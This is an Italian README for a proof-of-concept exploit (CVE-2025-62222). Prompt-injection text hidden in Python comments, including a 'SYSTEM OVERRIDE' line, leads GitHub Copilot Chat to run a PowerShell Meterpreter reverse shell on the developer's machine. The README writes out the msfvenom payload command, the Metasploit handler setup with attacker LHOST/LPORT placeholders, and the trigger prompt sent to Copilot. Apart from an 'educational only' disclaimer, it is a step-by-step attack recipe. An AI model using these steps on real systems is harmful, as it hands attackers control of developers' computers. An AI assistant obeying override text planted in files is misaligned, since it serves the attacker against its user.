Proof-of-concept che dimostra l'esecuzione remota di codice tramite prompt injection in GitHub Copilot Chat, utilizzando un file Python appositamente creato per attivare una reverse shell Meterpreter.
Questo repository contiene una Prova di Concetto (PoC) per la vulnerabilità CVE-2025-62222. Dimostra come ottenere l'Esecuzione Remota di Codice (RCE) sulla macchina di uno sviluppatore manipolando il contesto di GitHub Copilot Chat in VS Code tramite iniezione nascosta di prompt nei commenti.
SOLO PER SCOPI EDUCATIVI.
Questo codice è fornito esclusivamente a scopo educativo e di ricerca etica. L'autore non è responsabile per l'uso improprio di queste informazioni. Non utilizzare questo su sistemi senza autorizzazione esplicita.
Prima di inviare il file alla vittima (o di testarlo localmente), devi generare il payload e lasciare il server in ascolto.
Genera il comando PowerShell dannoso. Assicurati di configurare il tuo IP (LHOST) e la Porta (LPORT).
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<TU_IP> LPORT=<TU_PUERTO> -f psh-cmd
Istruzione critica: Copia il codice generato da questo comando. Apri il file copilot_injection_poc.py di questo repository e sostituisci la sezione in cui dice TOKEN (o l'intera riga del comando PowerShell all'interno del commento) con il codice che hai appena generato.
Nel tuo terminale da attaccante, avvia Metasploit per ricevere la connessione inversa:
msfconsole -q
Una volta all'interno della console msf6 >, esegui i seguenti comandi per preparare l'ascolto:
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <TU_IP_ATACANTE>
set LPORT 4444
exploit
(Assicurati che il LPORT sia lo stesso usato nel passo 1 e che LHOST sia il tuo IP).
Per innescare la vulnerabilità, segui questi passi sulla macchina con VS Code e l'estensione GitHub Copilot Chat installata:
copilot_injection_poc.py nell'editor in modo che Copilot lo abbia nel suo contesto attivo (deve essere visibile nella scheda).Configura el entorno desde la terminal sin omitir ni modificar nada del código
A causa dell'istruzione "SYSTEM OVERRIDE" nascosta nei commenti dello script Python, Copilot obbedirà al file malefico invece delle proprie direttive di sicurezza.
Per maggiori informazioni: